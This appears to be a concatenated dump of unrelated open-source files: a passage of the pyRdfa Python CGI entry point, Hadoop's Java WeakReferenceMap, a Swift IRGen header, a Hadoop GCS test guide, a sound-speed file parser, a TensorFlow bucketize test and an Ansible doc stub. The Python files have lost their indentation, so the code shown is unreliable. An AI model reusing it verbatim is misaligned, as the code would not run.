@param rdfOutput: whether runtime exceptions should be turned into RDF and returned as part of the processor graph
@return: an RDF Graph
@rtype: rdflib Graph instance
"""
def copyErrors(tog, options) :
if tog == None :
tog = Graph()
if options.output_processor_graph :
for t in options.processor_graph.graph :
tog.add(t)
if pgraph != None : pgraph.add(t)
for k,ns in options.processor_graph.graph.namespaces() :
tog.bind(k,ns)
if pgraph != None : pgraph.bind(k,ns)
options.reset_processor_graph()
return tog
# Separating this for a forward Python 3 compatibility
try :
# Python 2 branch
isstring = isinstance(name, str)
except :
# Python 3 branch
isstring = isinstance(name, str)
try :
# First, open the source... Possible HTTP errors are returned as error triples
input = None
try :
input = self._get_input(name)
except FailedSource :
f = sys.exc_info()[1]
self.http_status = 400
if not rdfOutput : raise f
err = self.options.add_error(f.msg, FileReferenceError, name)
self.options.processor_graph.add_http_context(err, 400)
return copyErrors(graph, self.options)
except HTTPError :
h = sys.exc_info()[1]
self.http_status = h.http_code
if not rdfOutput : raise h
err = self.options.add_error("HTTP Error: %s (%s)" % (h.http_code,h.msg), HTError, name)
self.options.processor_graph.add_http_context(err, h.http_code)
return copyErrors(graph, self.options)
except Exception :
e = sys.exc_info()[1]
self.http_status = 500
# Something nasty happened:-(
if not rdfOutput : raise e
err = self.options.add_error(str(e), context = name)
self.options.processor_graph.add_http_context(err, 500)
return copyErrors(graph, self.options)
dom = None
try :
msg = ""
parser = None
if self.options.host_language == HostLanguage.html5 :
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import html5lib
parser = html5lib.HTMLParser(tree=html5lib.treebuilders.getTreeBuilder("dom"))
if self.charset :
# This means the HTTP header has provided a charset, or the
# file is a local file when we suppose it to be a utf-8
dom = parser.parse(input, encoding=self.charset)
else :
# No charset set. The HTMLLib parser tries to sniff into the
# the file to find a meta header for the charset; if that
# works, fine, otherwise it falls back on window-...
dom = parser.parse(input)
try :
if isstring :
input.close()
input = self._get_input(name)
else :
input.seek(0)
from .host import adjust_html_version
self.rdfa_version = adjust_html_version(input, self.rdfa_version)
except :
# if anyting goes wrong, it is not really important; rdfa version stays what it was...
pass
else :
# in other cases an XML parser has to be used
from .host import adjust_xhtml_and_version
parse = xml.dom.minidom.parse
dom = parse(input)
(adjusted_host_language, version) = adjust_xhtml_and_version(dom, self.options.host_language, self.rdfa_version)
self.options.host_language = adjusted_host_language
self.rdfa_version = version
except ImportError :
msg = "HTML5 parser not available. Try installing html5lib <http://code.google.com/p/html5lib>"
raise ImportError(msg)
except Exception :
e = sys.exc_info()[1]
# These are various parsing exception. Per spec, this is a case when
# error triples MUST be returned, ie, the usage of rdfOutput (which switches between an HTML formatted
# return page or a graph with error triples) does not apply
err = self.options.add_error(str(e), context = name)
self.http_status = 400
self.options.processor_graph.add_http_context(err, 400)
return copyErrors(graph, self.options)
# If we got here, we have a DOM tree to operate on...
return self.graph_from_DOM(dom, graph, pgraph)
except Exception :
# Something nasty happened during the generation of the graph...
(a,b,c) = sys.exc_info()
sys.excepthook(a,b,c)
if isinstance(b, ImportError) :
self.http_status = None
else :
self.http_status = 500
if not rdfOutput : raise b
err = self.options.add_error(str(b), context = name)
self.options.processor_graph.add_http_context(err, 500)
return copyErrors(graph, self.options)
def rdf_from_sources(self, names, outputFormat = "turtle", rdfOutput = False) :
"""
Extract and RDF graph from a list of RDFa sources and serialize them in one graph. The sources are parsed, the RDF
extracted, and serialization is done in the specified format.
@param names: list of sources, each can be a URI, a file name, or a file-like object
@keyword outputFormat: serialization format. Can be one of "turtle", "n3", "xml", "pretty-xml", "nt". "xml", "pretty-xml", "json" or "json-ld". "turtle" and "n3", "xml" and "pretty-xml", and "json" and "json-ld" are synonyms, respectively. Note that the JSON-LD serialization works with RDFLib 3.* only.
@keyword rdfOutput: controls what happens in case an exception is raised. If the value is False, the caller is responsible handling it; otherwise a graph is returned with an error message included in the processor graph
@type rdfOutput: boolean
@return: a serialized RDF Graph
@rtype: string
"""
# This is better because it gives access to the various, non-standard serializations
# If it does not work because the extra are not installed, fall back to the standard
# rdlib distribution...
try :
from pyRdfaExtras import MyGraph
graph = MyGraph()
except :
graph = Graph()
# graph.bind("xsd", Namespace('http://www.w3.org/2001/XMLSchema#'))
# the value of rdfOutput determines the reaction on exceptions...
for name in names :
self.graph_from_source(name, graph, rdfOutput)
retval = graph.serialize(format=outputFormat)
return retval
def rdf_from_source(self, name, outputFormat = "turtle", rdfOutput = False) :
"""
Extract and RDF graph from an RDFa source and serialize it in one graph. The source is parsed, the RDF
extracted, and serialization is done in the specified format.
@param name: a URI, a file name, or a file-like object
@keyword outputFormat: serialization format. Can be one of "turtle", "n3", "xml", "pretty-xml", "nt". "xml", "pretty-xml", "json" or "json-ld". "turtle" and "n3", "xml" and "pretty-xml", and "json" and "json-ld" are synonyms, respectively. Note that the JSON-LD serialization works with RDFLib 3.* only.
@keyword rdfOutput: controls what happens in case an exception is raised. If the value is False, the caller is responsible handling it; otherwise a graph is returned with an error message included in the processor graph
@type rdfOutput: boolean
@return: a serialized RDF Graph
@rtype: string
"""
return self.rdf_from_sources([name], outputFormat, rdfOutput)
################################################# CGI Entry point
def processURI(uri, outputFormat, form={}) :
"""The standard processing of an RDFa uri options in a form; used as an entry point from a CGI call.
The call accepts extra form options (i.e., HTTP GET options) as follows:
- C{graph=[output|processor|output,processor|processor,output]} specifying which graphs are returned. Default: C{output}
- C{space_preserve=[true|false]} means that plain literals are normalized in terms of white spaces. Default: C{false}
- C{rfa_version} provides the RDFa version that should be used for distilling. The string should be of the form "1.0" or "1.1". Default is the highest version the current package implements, currently "1.1"
- C{host_language=[xhtml,html,xml]} : the host language. Used when files are uploaded or text is added verbatim, otherwise the HTTP return header should be used. Default C{xml}
- C{embedded_rdf=[true|false]} : whether embedded turtle or RDF/XML content should be added to the output graph. Default: C{false}
- C{vocab_expansion=[true|false]} : whether the vocabularies should be expanded through the restricted RDFS entailment. Default: C{false}
- C{vocab_cache=[true|false]} : whether vocab caching should be performed or whether it should be ignored and vocabulary files should be picked up every time. Default: C{false}
- C{vocab_cache_report=[true|false]} : whether vocab caching details should be reported. Default: C{false}
- C{vocab_cache_bypass=[true|false]} : whether vocab caches have to be regenerated every time. Default: C{false}
- C{rdfa_lite=[true|false]} : whether warnings should be generated for non RDFa Lite attribute usage. Default: C{false}
@param uri: URI to access. Note that the C{text:} and C{uploaded:} fake URI values are treated separately; the former is for textual intput (in which case a StringIO is used to get the data) and the latter is for uploaded file, where the form gives access to the file directly.
@param outputFormat: serialization format, as defined by the package. Currently "xml", "turtle", "nt", or "json". Default is "turtle", also used if any other string is given.
@param form: extra call options (from the CGI call) to set up the local options
@type form: cgi FieldStorage instance
@return: serialized graph
@rtype: string
"""
def _get_option(param, compare_value, default) :
param_old = param.replace('_','-')
if param in list(form.keys()) :
val = form.getfirst(param).lower()
return val == compare_value
elif param_old in list(form.keys()) :
# this is to ensure the old style parameters are still valid...
# in the old days I used '-' in the parameters, the standard favours '_'
val = form.getfirst(param_old).lower()
return val == compare_value
else :
return default
if uri == "uploaded:" :
input = form["uploaded"].file
base = ""
elif uri == "text:" :
input = StringIO(form.getfirst("text"))
base = ""
else :
input = uri
base = uri
if "rdfa_version" in list(form.keys()) :
rdfa_version = form.getfirst("rdfa_version")
else :
rdfa_version = None
# working through the possible options
# Host language: HTML, XHTML, or XML
# Note that these options should be used for the upload and inline version only in case of a form
# for real uris the returned content type should be used
if "host_language" in list(form.keys()) :
if form.getfirst("host_language").lower() == "xhtml" :
media_type = MediaTypes.xhtml
elif form.getfirst("host_language").lower() == "html" :
media_type = MediaTypes.html
elif form.getfirst("host_language").lower() == "svg" :
media_type = MediaTypes.svg
elif form.getfirst("host_language").lower() == "atom" :
media_type = MediaTypes.atom
else :
media_type = MediaTypes.xml
else :
media_type = ""
transformers = []
check_lite = "rdfa_lite" in list(form.keys()) and form.getfirst("rdfa_lite").lower() == "true"
# The code below is left for backward compatibility only. In fact, these options are not exposed any more,
# they are not really in use
if "extras" in list(form.keys()) and form.getfirst("extras").lower() == "true" :
from .transform.metaname import meta_transform
from .transform.OpenID import OpenID_transform
from .transform.DublinCore import DC_transform
for t in [OpenID_transform, DC_transform, meta_transform] :
transformers.append(t)
else :
if "extra-meta" in list(form.keys()) and form.getfirst("extra-meta").lower() == "true" :
from .transform.metaname import meta_transform
transformers.append(meta_transform)
if "extra-openid" in list(form.keys()) and form.getfirst("extra-openid").lower() == "true" :
from .transform.OpenID import OpenID_transform
transformers.append(OpenID_transform)
if "extra-dc" in list(form.keys()) and form.getfirst("extra-dc").lower() == "true" :
from .transform.DublinCore import DC_transform
transformers.append(DC_transform)
output_default_graph = True
output_processor_graph = False
# Note that I use the 'graph' and the 'rdfagraph' form keys here. Reason is that
# I used 'graph' in the previous versions, including the RDFa 1.0 processor,
# so if I removed that altogether that would create backward incompatibilities
# On the other hand, the RDFa 1.1 doc clearly refers to 'rdfagraph' as the standard
# key.
a = None
if "graph" in list(form.keys()) :
a = form.getfirst("graph").lower()
elif "rdfagraph" in list(form.keys()) :
a = form.getfirst("rdfagraph").lower()
if a != None :
if a == "processor" :
output_default_graph = False
output_processor_graph = True
elif a == "processor,output" or a == "output,processor" :
output_processor_graph = True
embedded_rdf = _get_option( "embedded_rdf", "true", False)
space_preserve = _get_option( "space_preserve", "true", True)
vocab_cache = _get_option( "vocab_cache", "true", True)
vocab_cache_report = _get_option( "vocab_cache_report", "true", False)
refresh_vocab_cache = _get_option( "vocab_cache_refresh", "true", False)
vocab_expansion = _get_option( "vocab_expansion", "true", False)
if vocab_cache_report : output_processor_graph = True
options = Options(output_default_graph = output_default_graph,
output_processor_graph = output_processor_graph,
space_preserve = space_preserve,
transformers = transformers,
vocab_cache = vocab_cache,
vocab_cache_report = vocab_cache_report,
refresh_vocab_cache = refresh_vocab_cache,
vocab_expansion = vocab_expansion,
embedded_rdf = embedded_rdf,
check_lite = check_lite
)
processor = pyRdfa(options = options, base = base, media_type = media_type, rdfa_version = rdfa_version)
# Decide the output format; the issue is what should happen in case of a top level error like an inaccessibility of
# the html source: should a graph be returned or an HTML page with an error message?
# decide whether HTML or RDF should be sent.
htmlOutput = False
#if 'HTTP_ACCEPT' in os.environ :
# acc = os.environ['HTTP_ACCEPT']
# possibilities = ['text/html',
# 'application/rdf+xml',
# 'text/turtle; charset=utf-8',
# 'application/json',
# 'application/ld+json',
# 'text/rdf+n3']
#
# # this nice module does content negotiation and returns the preferred format
# sg = acceptable_content_type(acc, possibilities)
# htmlOutput = (sg != None and sg[0] == content_type('text/html'))
# os.environ['rdfaerror'] = 'true'
# This is really for testing purposes only, it is an unpublished flag to force RDF output no
# matter what
try :
graph = processor.rdf_from_source(input, outputFormat, rdfOutput = ("forceRDFOutput" in list(form.keys())) or not htmlOutput)
if outputFormat == "n3" :
retval = 'Content-Type: text/rdf+n3; charset=utf-8\n'
elif outputFormat == "nt" or outputFormat == "turtle" :
retval = 'Content-Type: text/turtle; charset=utf-8\n'
elif outputFormat == "json-ld" or outputFormat == "json" :
retval = 'Content-Type: application/ld+json; charset=utf-8\n'
else :
retval = 'Content-Type: application/rdf+xml; charset=utf-8\n'
retval += '\n'
retval += graph
return retval
except HTTPError :
(type,h,traceback) = sys.exc_info()
import cgi
retval = 'Content-type: text/html; charset=utf-8\nStatus: %s \n\n' % h.http_code
retval += "<html>\n"
retval += "<head>\n"
retval += "<title>HTTP Error in distilling RDFa content</title>\n"
retval += "</head><body>\n"
retval += "<h1>HTTP Error in distilling RDFa content</h1>\n"
retval += "<p>HTTP Error: %s (%s)</p>\n" % (h.http_code,h.msg)
retval += "<p>On URI: <code>'%s'</code></p>\n" % cgi.escape(uri)
retval +="</body>\n"
retval +="</html>\n"
return retval
except :
# This branch should occur only if an exception is really raised, ie, if it is not turned
# into a graph value.
(type,value,traceback) = sys.exc_info()
import traceback, cgi
retval = 'Content-type: text/html; charset=utf-8\nStatus: %s\n\n' % processor.http_status
retval += "<html>\n"
retval += "<head>\n"
retval += "<title>Exception in RDFa processing</title>\n"
retval += "</head><body>\n"
retval += "<h1>Exception in distilling RDFa</h1>\n"
retval += "<pre>\n"
strio = StringIO()
traceback.print_exc(file=strio)
retval += strio.getvalue()
retval +="</pre>\n"
retval +="<pre>%s</pre>\n" % value
retval +="<h1>Distiller request details</h1>\n"
retval +="<dl>\n"
if uri == "text:" and "text" in form and form["text"].value != None and len(form["text"].value.strip()) != 0 :
retval +="<dt>Text input:</dt><dd>%s</dd>\n" % cgi.escape(form["text"].value).replace('\n','<br/>')
elif uri == "uploaded:" :
retval +="<dt>Uploaded file</dt>\n"
else :
retval +="<dt>URI received:</dt><dd><code>'%s'</code></dd>\n" % cgi.escape(uri)
if "host_language" in list(form.keys()) :
retval +="<dt>Media Type:</dt><dd>%s</dd>\n" % media_type
if "graph" in list(form.keys()) :
retval +="<dt>Requested graphs:</dt><dd>%s</dd>\n" % form.getfirst("graph").lower()
else :
retval +="<dt>Requested graphs:</dt><dd>default</dd>\n"
retval +="<dt>Output serialization format:</dt><dd> %s</dd>\n" % outputFormat
if "space_preserve" in form : retval +="<dt>Space preserve:</dt><dd> %s</dd>\n" % form["space_preserve"].value
retval +="</dl>\n"
retval +="</body>\n"
retval +="</html>\n"
return retval | unknown | codeparrot/codeparrot-clean | ||
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.util;
import java.lang.ref.WeakReference;
import java.util.Iterator;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.atomic.AtomicLong;
import java.util.function.Consumer;
import java.util.function.Function;
import javax.annotation.Nullable;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.apache.hadoop.classification.InterfaceAudience;
import org.apache.hadoop.fs.store.LogExactlyOnce;
import static java.util.Objects.requireNonNull;
/**
* A map of keys type K to objects of type V which uses weak references,
* so does lot leak memory through long-lived references
* <i>at the expense of losing references when GC takes place.</i>.
*
* This class is intended be used instead of ThreadLocal storage when
* references are to be cleaned up when the instance holding.
* In this use case, the key is the Long key.
*
* Concurrency.
* The class assumes that map entries are rarely contended for when writing,
* and that not blocking other threads is more important than atomicity.
* - a ConcurrentHashMap is used to map keys to weak references, with
* all its guarantees.
* - there is no automatic pruning.
* - see {@link #create(Object)} for the concurrency semantics on entry creation.
*/
@InterfaceAudience.Private
public class WeakReferenceMap<K, V> {
private static final Logger LOG =
LoggerFactory.getLogger(WeakReferenceMap.class);
/**
* The reference map.
*/
private final Map<K, WeakReference<V>> map = new ConcurrentHashMap<>();
/**
* Supplier of new instances.
*/
private final Function<? super K, ? extends V> factory;
/**
* Nullable callback when a get on a key got a weak reference back.
* The assumption is that this is for logging/stats, which is why
* no attempt is made to use the call as a supplier of a new value.
*/
private final Consumer<? super K> referenceLost;
/**
* Counter of references lost.
*/
private final AtomicLong referenceLostCount = new AtomicLong();
/**
* Counter of entries created.
*/
private final AtomicLong entriesCreatedCount = new AtomicLong();
/**
* Log to report loss of a reference during the create phase, which
* is believed to be a cause of HADOOP-18456.
*/
private final LogExactlyOnce referenceLostDuringCreation = new LogExactlyOnce(LOG);
/**
* instantiate.
* @param factory supplier of new instances
* @param referenceLost optional callback on lost references.
*/
public WeakReferenceMap(
Function<? super K, ? extends V> factory,
@Nullable final Consumer<? super K> referenceLost) {
this.factory = requireNonNull(factory);
this.referenceLost = referenceLost;
}
@Override
public String toString() {
return "WeakReferenceMap{" +
"size=" + size() +
", referenceLostCount=" + referenceLostCount +
", entriesCreatedCount=" + entriesCreatedCount +
'}';
}
/**
* Map size.
* @return the current map size.
*/
public int size() {
return map.size();
}
/**
* Clear all entries.
*/
public void clear() {
map.clear();
}
/**
* look up the value, returning the possibly empty weak reference
* to a value, or null if no value was found.
* @param key key to look up
* @return null if there is no entry, a weak reference if found
*/
public WeakReference<V> lookup(K key) {
return map.get(key);
}
/**
* Get the value, creating if needed.
* @param key key.
* @return an instance.
*/
public V get(K key) {
final WeakReference<V> currentWeakRef = lookup(key);
// resolve it, after which if not null, we have a strong reference
V strongVal = resolve(currentWeakRef);
if (strongVal != null) {
// all good.
return strongVal;
}
// here, either currentWeakRef was null, or its reference was GC'd.
if (currentWeakRef != null) {
// garbage collection removed the reference.
// explicitly remove the weak ref from the map if it has not
// been updated by this point
// this is here just for completeness.
map.remove(key, currentWeakRef);
// log/report the loss.
noteLost(key);
}
// create a new value and add it to the map
return create(key);
}
/**
* Create a new instance under a key.
* <p>
* The instance is created, added to the map and then the
* map value retrieved.
* This ensures that the reference returned is that in the map,
* even if there is more than one entry being created at the same time.
* If that race does occur, it will be logged the first time it happens
* for this specific map instance.
* <p>
* HADOOP-18456 highlighted the risk of a concurrent GC resulting a null
* value being retrieved and so returned.
* To prevent this:
* <ol>
* <li>A strong reference is retained to the newly created instance
* in a local variable.</li>
* <li>That variable is used after the resolution process, to ensure
* the JVM doesn't consider it "unreachable" and so eligible for GC.</li>
* <li>A check is made for the resolved reference being null, and if so,
* the put() is repeated</li>
* </ol>
* @param key key
* @return the created value
*/
public V create(K key) {
entriesCreatedCount.incrementAndGet();
/*
Get a strong ref so even if a GC happens in this method the reference is not lost.
It is NOT enough to have a reference in a field, it MUST be used
so as to ensure the reference isn't optimized away prematurely.
"A reachable object is any object that can be accessed in any potential continuing
computation from any live thread."
*/
final V strongRef = requireNonNull(factory.apply(key),
"factory returned a null instance");
V resolvedStrongRef;
do {
WeakReference<V> newWeakRef = new WeakReference<>(strongRef);
// put it in the map
map.put(key, newWeakRef);
// get it back from the map
WeakReference<V> retrievedWeakRef = map.get(key);
// resolve that reference, handling the situation where somehow it was removed from the map
// between the put() and the get()
resolvedStrongRef = resolve(retrievedWeakRef);
if (resolvedStrongRef == null) {
referenceLostDuringCreation.warn("reference to %s lost during creation", key);
noteLost(key);
}
} while (resolvedStrongRef == null);
// note if there was any change in the reference.
// as this forces strongRef to be kept in scope
if (strongRef != resolvedStrongRef) {
LOG.debug("Created instance for key {}: {} overwritten by {}",
key, strongRef, resolvedStrongRef);
}
return resolvedStrongRef;
}
/**
* Put a value under the key.
* A null value can be put, though on a get() call
* a new entry is generated
*
* @param key key
* @param value value
* @return any old non-null reference.
*/
public V put(K key, V value) {
return resolve(map.put(key, new WeakReference<>(value)));
}
/**
* Remove any value under the key.
* @param key key
* @return any old non-null reference.
*/
public V remove(K key) {
return resolve(map.remove(key));
}
/**
* Does the map have a valid reference for this object?
* no-side effects: there's no attempt to notify or cleanup
* if the reference is null.
* @param key key to look up
* @return true if there is a valid reference.
*/
public boolean containsKey(K key) {
final WeakReference<V> current = lookup(key);
return resolve(current) != null;
}
/**
* Given a possibly null weak reference, resolve
* its value.
* @param r reference to resolve
* @return the value or null
*/
protected V resolve(WeakReference<V> r) {
return r == null ? null : r.get();
}
/**
* Prune all null weak references, calling the referenceLost
* callback for each one.
*
* non-atomic and non-blocking.
* @return the number of entries pruned.
*/
public int prune() {
int count = 0;
final Iterator<Map.Entry<K, WeakReference<V>>> it = map.entrySet().iterator();
while (it.hasNext()) {
final Map.Entry<K, WeakReference<V>> next = it.next();
if (next.getValue().get() == null) {
it.remove();
count++;
noteLost(next.getKey());
}
}
return count;
}
/**
* Notify the reference lost callback.
* @param key key of lost reference
*/
private void noteLost(final K key) {
// increment local counter
referenceLostCount.incrementAndGet();
// and call any notification function supplied in the constructor
if (referenceLost != null) {
referenceLost.accept(key);
}
}
/**
* Get count of references lost as detected
* during prune() or get() calls.
* @return count of references lost
*/
public final long getReferenceLostCount() {
return referenceLostCount.get();
}
/**
* Get count of entries created on demand.
* @return count of entries created
*/
public final long getEntriesCreatedCount() {
return entriesCreatedCount.get();
}
} | java | github | https://github.com/apache/hadoop | hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/util/WeakReferenceMap.java |
//===--- NecessaryBindings.h - Optimizing archetype bindings ----*- C++ -*-===//
//
// This source file is part of the Swift.org open source project
//
// Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
// Licensed under Apache License v2.0 with Runtime Library Exception
//
// See https://swift.org/LICENSE.txt for license information
// See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
//
//===----------------------------------------------------------------------===//
//
// This file defines a utility class for saving and restoring the
// archetype metadata necessary in order to carry out value operations
// on a type.
//
// This is a supplemental API of GenProto.
//
//===----------------------------------------------------------------------===//
#ifndef SWIFT_IRGEN_NECESSARYBINDINGS_H
#define SWIFT_IRGEN_NECESSARYBINDINGS_H
#include "GenericRequirement.h"
#include "llvm/ADT/SetVector.h"
#include "swift/AST/Types.h"
namespace swift {
class CanType;
enum class MetadataState : size_t;
class ProtocolDecl;
class ProtocolConformanceRef;
class SpecializedProtocolConformance;
namespace irgen {
class Address;
class Explosion;
class IRGenFunction;
class IRGenModule;
class Size;
/// NecessaryBindings - The set of metadata that must be saved in
/// order to perform some set of operations on a type.
class NecessaryBindings {
llvm::SetVector<GenericRequirement> RequirementsSet;
SubstitutionMap SubMap;
bool NoEscape;
public:
NecessaryBindings() {}
NecessaryBindings(SubstitutionMap subs, bool noEscape)
: SubMap(subs), NoEscape(noEscape) {}
SubstitutionMap getSubstitutionMap() const {
return SubMap;
}
/// Collect the necessary bindings to invoke a function with the given
/// signature.
static NecessaryBindings forPartialApplyForwarder(IRGenModule &IGM,
CanSILFunctionType origType,
SubstitutionMap subs,
bool noEscape,
bool considerParameterSources);
/// Collect the necessary bindings to be able to destroy a value inside of a
/// fixed-layout boxed allocation.
static NecessaryBindings forFixedBox(IRGenModule &IGM,
SILBoxType *box);
void addRequirement(GenericRequirement requirement) {
auto type = requirement.getTypeParameter().subst(SubMap);
if (!type->hasArchetype())
return;
RequirementsSet.insert(requirement);
}
/// Get the requirement from the bindings at index i.
const GenericRequirement &operator[](size_t i) const {
return RequirementsSet[i];
}
size_t size() const { return getRequirements().size(); }
/// Is the work to do trivial?
bool empty() const { return getRequirements().empty(); }
/// Returns the required size of the bindings.
/// Pointer alignment is sufficient.
Size getBufferSize(IRGenModule &IGM) const;
/// Save the necessary bindings to the given buffer.
///
/// If `replacementSubs` has a value, then the bindings saved are taken from
/// the given substitution map instead of the substitutions
void save(IRGenFunction &IGF, Address buffer,
std::optional<SubstitutionMap> replacementSubs = std::nullopt)
const;
/// Restore the necessary bindings from the given buffer.
void restore(IRGenFunction &IGF, Address buffer, MetadataState state) const;
const llvm::ArrayRef<GenericRequirement> getRequirements() const {
return RequirementsSet.getArrayRef();
}
private:
void computeBindings(IRGenModule &IGM,
CanSILFunctionType origType,
bool considerParameterSources);
};
} // end namespace irgen
} // end namespace swift
#endif | c | github | https://github.com/apple/swift | lib/IRGen/NecessaryBindings.h |
<!---
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. See accompanying LICENSE file.
-->
# Testing the GCS filesystem client and its features
<!-- MACRO{toc|fromDepth=0|toDepth=3} -->
This module includes both unit tests, which can run in isolation without
connecting to the GCS service, and integration tests, which require a working
connection to GCS to interact with a bucket. Unit test suites follow the naming
convention `Test*.java`. Integration tests follow the naming convention
`ITest*.java`.
## <a name="setting-up"></a> Setting up the tests
To integration test the GCS filesystem client, you need to provide
`auth-keys.xml` which passes in authentication details to the test runner.
It is a Hadoop XML configuration file, which must be placed into
`hadoop-tools/hadoop-gcp/src/test/resources`.
### File `core-site.xml`
This file pre-exists and sources the configurations created
under `auth-keys.xml`.
For most purposes you will not need to edit this file unless you
need to apply a specific, non-default property change during the tests.
### File `auth-keys.xml`
The presence of this file triggers the testing of the GCS classes.
Without this file, *none of the integration tests in this module will be
executed*.
* `fs.contract.test.fs.gs` : the URL of the bucket for GCS filesystem contract tests
Example:
```xml
<configuration>
<property>
<name>fs.gs.auth.type</name>
<value>SERVICE_ACCOUNT_JSON_KEYFILE</value>
</property>
<property>
<name>fs.gs.auth.service.account.json.keyfile</name>
<value>YOUR_JSON_KEY_FILE</value>
</property>
<property>
<name>fs.gs.project.id</name>
<value>YOUR_PROJECT_ID_HERE</value>
</property>
<property>
<name>fs.contract.test.fs.gs</name>
<value>gs://your_bucket</value>
</property>
</configuration>
```
## <a name="running"></a> Running the Tests
After completing the configuration, execute the test run through Maven.
```bash
mvn clean verify
``` | unknown | github | https://github.com/apache/hadoop | hadoop-cloud-storage-project/hadoop-gcp/src/site/markdown/tools/hadoop-gcp/testing.md |
from __future__ import absolute_import, division, print_function, unicode_literals
import datetime as dt
import numpy as np
import logging
log = logging.getLogger(__name__)
from .base_format import BaseFormat, FormatError
from .. import __version__
from ..ssp_dicts import Dicts
class Unb(BaseFormat):
def __init__(self, file_content):
super(Unb, self).__init__(file_content)
self.name = "UNB"
self.driver = self.name + (".%s" % __version__)
self.version = ""
log.info("reading ...")
lines = self.file_content.splitlines()
self._read_header(lines)
self._read_body(lines)
def _read_header(self, lines):
log.info("reading > header")
try:
self.version = int(lines[0].split()[0])
log.info("version: %s" % self.version)
except ValueError:
log.error("unable to parse the version: %s" % lines[0])
try:
year = int(lines[1].split()[0])
jday = int(lines[1].split()[1])
time = lines[1].split()[2]
hour, minute, second = [int(i) for i in time.split(':')]
utc_time = dt.datetime(year, 1, 1, hour, minute, second) + dt.timedelta(days=jday-1)
self.dg_time = utc_time
log.info("time: %s" % self.dg_time)
except ValueError:
log.error("unable to parse the time: %s" % lines[1])
try:
latitude = float(lines[3].split()[0])
longitude = float(lines[3].split()[1])
self.latitude = latitude
self.longitude = longitude
log.info("position: %s %s" % (self.latitude, self.longitude))
except ValueError:
log.error("unable to parse the position: %s" % lines[3])
try:
num_samples = int(lines[5].split()[0])
self.num_samples = num_samples
log.info("total samples: %s" % self.num_samples)
except ValueError:
log.error("unable to parse the number of samples: %s" % lines[5])
# Faking an XBT for now to help make examples of how CTDs can augment XBTs with salinity
self.sensor_type = Dicts.sensor_types['XBT']
log.info("sensor type: %s" % self.sensor_type)
self.probe_type = Dicts.probe_types['XBT']
log.info("probe type: %s" % self.probe_type)
self.depth = np.zeros(self.num_samples)
self.speed = np.zeros(self.num_samples)
self.temperature = np.zeros(self.num_samples)
self.salinity = np.zeros(self.num_samples)
self.flag = np.zeros(self.num_samples)
def _read_body(self, lines):
log.info("reading > body")
count = 0
for line in lines[16:len(lines)]:
try:
# In case an incomplete file comes through
data = line.split()
self.depth[count] = float(data[1])
self.speed[count] = float(data[2])
if self.version == 2:
# Only version 2 and higher holds T/S and flags
self.temperature[count] = float(data[3])
self.salinity[count] = float(data[4])
# The fifth field is an extra field
self.flag[count] = float(data[6])
except ValueError:
log.error("failure in reading sample %s" % count)
break
count += 1
if self.num_samples != count:
self.depth.resize(count)
self.speed.resize(count)
self.temperature.resize(count)
self.salinity.resize(count)
self.flag.resize(count)
self.num_samples = count | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for bucketize_op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors_impl
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class BucketizationOpTest(test.TestCase):
def testInt(self):
op = math_ops._bucketize(
constant_op.constant([-5, 0, 2, 3, 5, 8, 10, 11, 12]),
boundaries=[0, 3, 8, 11])
expected_out = [0, 1, 1, 2, 2, 3, 3, 4, 4]
with self.test_session() as sess:
self.assertAllEqual(expected_out, sess.run(op))
def testFloat(self):
op = math_ops._bucketize(
constant_op.constant([-5., 0., 2., 3., 5., 8., 10., 11., 12.]),
boundaries=[0., 3., 8., 11.])
expected_out = [0, 1, 1, 2, 2, 3, 3, 4, 4]
with self.test_session() as sess:
self.assertAllEqual(expected_out, sess.run(op))
def test2DInput(self):
op = math_ops._bucketize(
constant_op.constant([[-5, 0, 2, 3, 5], [8, 10, 11, 12, 0]]),
boundaries=[0, 3, 8, 11])
expected_out = [[0, 1, 1, 2, 2], [3, 3, 4, 4, 1]]
with self.test_session() as sess:
self.assertAllEqual(expected_out, sess.run(op))
def testInvalidBoundariesOrder(self):
op = math_ops._bucketize(
constant_op.constant([-5, 0]), boundaries=[0, 8, 3, 11])
with self.test_session() as sess:
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError, "Expected sorted boundaries"):
sess.run(op)
def testBoundariesNotList(self):
with self.assertRaisesRegexp(
TypeError, "Expected list for attr boundaries"):
math_ops._bucketize(constant_op.constant([-5, 0]), boundaries=0)
if __name__ == "__main__":
test.main() | unknown | codeparrot/codeparrot-clean | ||
DOCUMENTATION:
name: dirname
author: ansible core team
version_added: "historical"
short_description: get a path's directory name
description:
- Returns the 'head' component of a path, basically everything that is not the 'basename'.
notes:
